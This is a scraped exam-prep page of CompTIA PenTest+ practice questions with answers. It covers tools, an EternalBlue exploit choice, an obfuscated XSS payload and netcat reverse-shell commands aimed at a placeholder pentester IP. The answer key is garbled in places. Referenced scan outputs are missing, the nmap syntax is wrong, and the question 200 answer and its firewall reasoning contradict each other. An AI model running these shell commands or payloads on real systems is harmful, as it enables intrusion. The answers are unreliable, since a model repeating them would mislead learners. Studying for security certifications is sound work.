PT0-003 Practice Questions & Online Exam Preparation

PT0-003 Exam Details

Exam Code
:PT0-003
Exam Name
:CompTIA PenTest+
Certification
:CompTIA Certifications
Vendor
:CompTIA
Total Questions
:404 Q&As
Last Updated
:Jun 09, 2026

CompTIA PT0-003 Online Questions & Answers

Question 191:

A penetration tester is attempting to discover vulnerabilities in a company's web application.
Which of the following tools would most likely assist with testing the security of the web application?
A. OpenVAS
B. Nessus
C. sqlmap
D. Nikto

D. Nikto
Explanation
When testing the security of a web application, specific tools are designed to uncover vulnerabilities and issues.
Question 192:

A penetration tester completes a scan and sees the following output on a host:
The tester wants to obtain shell access.
Which of the following related exploits should the tester try first?
A. exploit/windows/smb/psexec
B. exploit/windows/smb/ms08_067_netapi
C. exploit/windows/smb/ms17_010_eternalblue
D. auxiliary/scanner/snmp/snmp_login

C. exploit/windows/smb/ms17_010_eternalblue
Explanation
The ms17_010_eternalblue exploit is the most appropriate choice based on the scenario.
Why MS17-010 EternalBlue?
EternalBlue is a critical vulnerability in SMBv1 (port 445) affecting older versions of Windows, including Windows 7.
The exploit can be used to execute arbitrary code remotely, providing shell access to the target system.
Other Options:
Option A (psexec): This exploit is a post-exploitation tool that requires valid credentials to execute commands remotely.
Option B (ms08_067_netapi): A vulnerability targeting older Windows systems (e.g., Windows XP). It is unlikely to work on Windows 7.
Option D (snmp_login): This is an auxiliary module for enumerating SNMP, not gaining shell access.
References:
Domain 2.0 (Information Gathering and Vulnerability Identification) Domain 3.0 (Attacks and Exploits)
Question 193:

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server's input validation that will allow unauthorized transactions on behalf of the user.
Which of the following techniques would most likely be used for that purpose?
A. Privilege escalation
B. DOM injection
C. Session hijacking
D. Cross-site scripting

D. Cross-site scripting
Explanation
Cross-site scripting (XSS) is a client-side attack where an attacker injects malicious scripts into a web page viewed by other users. When executed in a browser, it can steal session cookies, perform unauthorized transactions, or execute malicious actions on behalf of the victim.
Option D (Cross-site scripting) is correct because XSS can manipulate client-side input validation to execute unauthorized transactions.
Option A (Privilege escalation) is incorrect because it involves gaining higher privileges on a system, not attacking input validation in a web application.
Option B (DOM injection) is incorrect because DOM-based attacks manipulate browser-side JavaScript but are not necessarily used for unauthorized transactions.
Option C (Session hijacking) is incorrect because session hijacking requires capturing a valid user session, whereas XSS can steal session tokens for this purpose.
References:
CompTIA PenTest+ PT0-003 Official Guide ?Chapter 6 (Web Application Attacks).
Question 194:

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:
/home/user/scripts
Which of the following commands should the penetration tester use to perform this scan?
A. nmap resume "not intrusive"
B. nmap script default safe
C. nmap script /home/user/scripts
D. nmap -load /home/user/scripts

C. nmap script /home/user/scripts
Explanation
The Nmap command in the question aims to use custom NSE scripts stored in a specific folder. The correct syntax for this option is to use the script argument followed by the path to the folder. The other commands are either invalid, use the wrong argument, or do not specify the folder path.
References:
Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs -- CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam
Question 195:

During passive reconnaissance of a target organization's infrastructure, a penetration tester wants to identify key contacts and job responsibilities within the company.
Which of the following techniques would be the most effective for this situation?
A. Social media scraping
B. Website archive and caching
C. DNS lookup
D. File metadata analysis

A. Social media scraping
Explanation
Social media scraping involves collecting information from social media platforms where employees might share their roles, responsibilities, and professional affiliations. This method can reveal detailed insights into the organizational structure, key personnel, and specific job functions within the target organization, making it an invaluable tool for understanding the company's internal landscape without alerting the target to the reconnaissance activities.
Question 196:

PCI DSS requires which of the following as part of the penetration-testing process?
A. The penetration tester must have cybersecurity certifications.
B. The network must be segmented.
C. Only externally facing systems should be tested.
D. The assessment must be performed during non-working hours.

B. The network must be segmented.
Question 197:

A penetration tester needs to evaluate the order in which the next systems will be selected for testing.
Given the following output:
Which of the following targets should the tester select next?
A. fileserver
B. hrdatabase
C. legaldatabase
D. financesite

A. fileserver
Explanation
Evaluation Criteria:
Analysis:
Selection Justification:
References:
Risk Prioritization: Balancing between severity (CVSS) and exploitability (EPSS) is crucial for effective vulnerability management. Risk Assessment: Evaluating both the impact and the likelihood of exploitation helps in making informed decisions about testing priorities. By selecting the fileserver, the penetration tester focuses on a target that is highly likely to be exploited, addressing the most immediate risk based on the given scores.
Question 198:

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:
7/<sCRitP>aLeRt('pwned')</ScriPt> Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?
A. Arbitrary code execution: the affected computer should be placed on a perimeter network
B. SQL injection attack: should be detected and prevented by a web application firewall
C. Cross-site request forgery: should be detected and prevented by a firewall
D. XSS obfuscated: should be prevented by input sanitization

D. XSS obfuscated: should be prevented by input sanitization
Explanation
XSS Attack Explanation:
The payload exploits Cross-Site Scripting (XSS) by injecting obfuscated JavaScript into the application.
When rendered, the browser executes the malicious code (e.g., alert('pwned')).
Obfuscation (<sCRitP> instead of <script>) attempts to bypass naive input filters.
Countermeasure:
Implement input sanitization to ensure all user inputs are properly validated and escaped before being processed or rendered.
Other measures include using Content Security Policies (CSP) and output encoding.
Why Not Other Options?
Option A: This is not arbitrary code execution; it is a browser-based attack.
Option B: XSS is unrelated to SQL injection.
Option C: Cross-Site Request Forgery (CSRF) is a different vulnerability targeting session handling, not script injection.
References:
Domain 3.0 (Attacks and Exploits) OWASP XSS Prevention Cheat Sheet
Question 199:

Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?
A. NIST SP 800-53
B. ISO 27001
C. GDPR

C. GDPR
Explanation
GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when the consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.
Question 200:

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org.
Which of the following should the tester use to perform the task with the fewest web requests?
A. nc -e /bin/sh -lp 53
B. /bin/sh -c 'nc -l -p 443'
C. nc -e /bin/sh <pentester_ip> 53
D. /bin/sh -c 'nc <pentester_ip> 443'

D. /bin/sh -c 'nc <pentester_ip> 443'
Explanation
The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.
Example:
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
The pentester listens on TCP 443 and receives the shell from the target.
References:
CompTIA PenTest+ PT0-003 Official Study Guide - "Pivoting and Network Tunneling Techniques"
Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.

PT0-003 Exam Details

Exam Code

Exam Name

Certification

Vendor

Total Questions

Last Updated

CompTIA PT0-003 Online Questions & Answers

Question 191:

Question 192:

Question 193:

Question 194:

Question 195:

Question 196:

Question 197:

Question 198:

Question 199:

Question 200:

Related Exams:

220-1001

220-1002

220-1101

220-1102

220-1201

220-1202

220-902

CAS-004

CAS-005

CLO-001

Tips on How to Prepare for the Exams

CompTIA PT0-003 Online Practice Questions and Exam Preparation

PT0-003 Exam Details

Exam Code

Exam Name

Certification

Vendor

Total Questions

Last Updated

CompTIA PT0-003 Online Questions & Answers

Question 191:

Question 192:

Question 193:

Question 194:

Question 195:

Question 196:

Question 197:

Question 198:

Question 199:

Question 200:

Related Exams:

Tips on How to Prepare for the Exams